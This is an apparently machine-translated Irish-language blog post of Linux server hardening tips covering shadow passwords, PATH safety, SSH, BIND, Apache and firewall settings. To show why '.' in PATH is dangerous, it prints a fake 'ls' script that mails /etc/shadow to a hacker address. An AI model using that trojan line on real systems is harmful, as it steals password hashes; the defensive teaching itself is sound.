Leideanna Slándála Do Linux (Freastalaí) (Cuid 1)

Níl aon rud foilsithe agam ar an mblag le fada agus ba mhaith liom roinnt comhairle a tógadh leat as leabhar a rinne, (I measc rudaí eile) a roinnt leat. Fuair ​​mé é ag an Ollscoil agus níor léigh mé ach agus cé go bhfuil sé as dáta go hionraic agus gur beag seans go n-oibreoidh na teicnící a thaispeántar i bhfianaise éabhlóid an chórais, is gnéithe suimiúla iad freisin is féidir a thaispeáint. 9788448140502

Ba mhaith liom a shoiléiriú gur comhairle iad atá dírithe ar chóras Linux a úsáidtear mar fhreastalaí, ar scála meánach nó ar scála mór b’fhéidir, ós rud é ar leibhéal an úsáideora deisce, cé gur féidir iad a chur i bhfeidhm, ní bheidís an-úsáideach.

Tugaim rabhadh freisin gur leideanna gasta simplí iad agus nach rachaidh mé isteach go mion, cé go bhfuil sé beartaithe agam post eile atá i bhfad níos sainiúla agus níos fairsinge a dhéanamh ar ábhar áirithe. Ach feicfidh mé sin níos déanaí. Ar aghaidh linn.

Polasaithe pasfhocal. 

Cé gur cosúil gur scafall é, déanann beartas maith pasfhocail an difríocht idir córas leochaileach nó nach bhfuil. Baineann ionsaithe ar nós “fórsa bruit” leas as drochfhocal faire a bheith acu chun rochtain a fháil ar chóras. Is iad na leideanna is coitianta:

  • Comhcheangail uachtair agus cás beag.
  • Úsáid carachtair speisialta.
  • Uimhreacha.
  • Níos mó ná 6 dhigit (níos mó ná 8 tá súil againn).

Chomh maith leis seo, déanaimis machnamh ar dhá chomhad riachtanacha.  / etc / passwd agus / etc / scáth.

Rud an-tábhachtach ná go bhfuil an comhad / etc / passwd. Seachas ainm an úsáideora a thabhairt dúinn, a uid, cosán fillteáin, bash .. srl. i gcásanna áirithe taispeánann sé eochair chriptithe an úsáideora freisin.

 Breathnaímid ar a chomhdhéanamh tipiciúil.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

úsáideoir: cryptkey: uid: gid: path :: path: bash

Is í an fhadhb cheart atá leis seo ná go bhfuil ceadanna sa chomhad áirithe seo -rw-r - r– rud a chiallaíonn gur léigh sé ceadanna d’aon úsáideoir ar an gcóras. agus níl sé an-deacair an eochair fhíor a fháil amach an eochair chriptithe a bheith agat.

Sin an fáth go bhfuil an comhad ann / srl / scáth. Is é seo an comhad ina stóráiltear na heochracha úsáideora go léir, i measc rudaí eile. Tá na ceadanna riachtanacha ag an gcomhad seo ionas nach féidir le haon úsáideoir é a léamh.

Chun é seo a shocrú ansin, caithfimid dul chuig an gcomhad / srl / passwd agus an eochair chriptithe a athrú go “x”, ní shábhálfaidh sé seo ach an eochair inár gcomhad / srl / scáth.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Fadhbanna leis an PATH agus .bashrc agus daoine eile.

Nuair a fhorghníomhaíonn úsáideoir ordú ar a chonsól, féachann an bhlaosc an t-ordú sin i liosta eolaire atá san athróg timpeallachta PATH.

Má chlóscríobhann tú "macalla $ PATH" sa chonsól, aschurfaidh sé rud mar seo.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

I ngach ceann de na fillteáin seo féachfaidh an bhlaosc leis an ordú atá scríofa chun é a fhorghníomhú. Sé "." ciallaíonn sé gurb é an chéad fhillteán atá le cuardach an fillteán céanna ón áit a ndéantar an t-ordú a fhorghníomhú.

Cuir i gcás go bhfuil úsáideoir "Carlos" ann agus ba mhaith leis an úsáideoir seo "olc a dhéanamh." D’fhéadfadh an t-úsáideoir seo comhad ar a dtugtar “ls” a fhágáil ina phríomhfhillteán, agus sa chomhad seo ordú mar:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Agus má dhéanann an t-úsáideoir fréimhe le haghaidh rudaí ceann scríbe, iarracht na fillteáin taobh istigh den fhillteán carlos a liostáil (agus é ag cuardach an ordaithe san fhillteán céanna sin ar dtús, de thaisme bheadh ​​sé ag seoladh an chomhaid leis na pasfhocail chuig an ríomhphost seo agus ansin na fillteáin bheadh ​​sé liostaithe agus ní bhfaigheadh ​​sé amach go dtí go déanach é.

Chun é seo a sheachaint ní mór dúinn deireadh a chur leis an "." den athróg PATH.

Ar an gcaoi chéanna, ba cheart comhaid mar /.bashrc, /.bashrc_profile, ./.login a iniúchadh agus a sheiceáil nach bhfuil "." san athróg PATH, agus i ndáiríre ó chomhaid mar an gceann seo, is féidir leat ceann scríbe ordaithe ar leith a athrú.

Leideanna le seirbhísí:

SHH

  • Díchumasaigh leagan 1 den phrótacal ssh sa chomhad sshd_config.
  • Ná lig don úsáideoir fréimhe logáil isteach le ssh.
  • Níor cheart ach na húsáideoirí fréimhe na comhaid agus na fillteáin ssh_host_key, ssh_host_dsa_key agus ssh_host_rsa_key a léamh.

BIND

  • Athraigh an teachtaireacht fáilte sa chomhad ainmnithe.conf ionas nach dtaispeánfaidh sí uimhir an leagain
  • Aistriú criosanna teorann, agus gan é a chumasú ach d’fhoirne a bhfuil gá acu leis.

Apache

  • Cosc a chur ar an tseirbhís ó do leagan a thaispeáint sa teachtaireacht fáilte. Cuir an comhad httpd.conf in eagar agus cuir nó athraigh na línte:  

ServerSignature Off
ServerTokens Prod

  • Innéacsú uathoibríoch a dhíchumasú
  • Cumraigh apache gan comhaid íogaire mar .htacces, * .inc, * .jsp .. srl a sheirbheáil
  • Bain leathanaigh fear nó sampla ón tseirbhís
  • Rith apache i dtimpeallacht chrooted

Slándáil Líonra.

Tá sé riachtanach gach iontráil fhéideartha ar do chóras a chlúdach ón líonra seachtrach, seo roinnt leideanna riachtanacha chun ionróirí a chosc ó scanadh agus faisnéis a fháil ó do líonra.

Cuir bac ar thrácht ICMP

Ní mór an balla dóiteáin a chumrú chun gach cineál tráchta ICMP isteach agus amach agus bac a chur ar fhreagairtí macalla. Leis seo seachnaíonn tú, mar shampla, aimsíonn scanóir atá ag lorg trealamh beo i raon ip tú. 

Seachain scanadh ping TCP.

Bealach amháin chun do chóras a scanadh is ea an scanadh ping TCP. Cuir i gcás go bhfuil freastalaí Apache ar chalafort 80 ar do fhreastalaí. D’fhéadfadh an t-ionróir iarratas ACK a sheoladh chuig an gcalafort sin, leis seo, má fhreagraíonn an córas, beidh an ríomhaire beo agus déanfaidh sé scanadh ar an gcuid eile de na calafoirt.

Chuige seo, ba cheart go mbeadh an rogha “feasacht stáit” i gcónaí ag do bhalla dóiteáin agus ba cheart dó gach paicéad ACK nach bhfreagraíonn do nasc nó seisiún TCP atá bunaithe cheana féin a scriosadh.

Roinnt leideanna breise:

  • Úsáid córais IDS chun scananna calafoirt a bhrath ar do líonra.
  • Cumraigh Balla Dóiteáin ionas nach mbeidh muinín aige as socruithe calafoirt foinse an cheangail.

Tá sé seo toisc go n-úsáideann roinnt scananna port foinse “bréige” mar 20 nó 53, ós rud é go bhfuil muinín ag go leor córais sna calafoirt seo toisc go bhfuil siad tipiciúil de ftp nó DNS.

TABHAIR FAOI DEARA: Cuimhnigh gur réitíodh an chuid is mó de na fadhbanna a léirítear sa phost seo i mbeagnach gach dáileadh reatha. Ach ní ghortaíonn sé riamh faisnéis thábhachtach a bheith agat faoi na míchaoithiúlachtaí sin ionas nach dtarlóidh siad duitse.

TABHAIR FAOI DEARA: Níos déanaí feicfidh mé ábhar ar leith agus déanfaidh mé post le faisnéis i bhfad níos mionsonraithe agus níos reatha.

Thaks gach duine le haghaidh léitheoireachta.

Beannachtaí.


Cloíonn ábhar an ailt lenár bprionsabail eitic eagarthóireachta. Chun earráid a thuairisciú cliceáil anseo.

A comment, fág mise

Fág do thrácht

Ní thabharfar do sheoladh r-phoist a fhoilsiú. Réimsí riachtanacha atá marcáilte le *

*

*

  1. Freagrach as na sonraí: Miguel Ángel Gatón
  2. Cuspóir na sonraí: SPAM a rialú, bainistíocht trácht.
  3. Legitimation: Do thoiliú
  4. Na sonraí a chur in iúl: Ní chuirfear na sonraí in iúl do thríú páirtithe ach amháin trí oibleagáid dhlíthiúil.
  5. Stóráil sonraí: Bunachar sonraí arna óstáil ag Occentus Networks (EU)
  6. Cearta: Tráth ar bith is féidir leat do chuid faisnéise a theorannú, a aisghabháil agus a scriosadh.

  1.   faisnéiseach a dúirt

    Thaitin an t-alt go mór liom agus tá suim agam san ábhar, molaim duit leanúint ar aghaidh ag uaslódáil ábhar.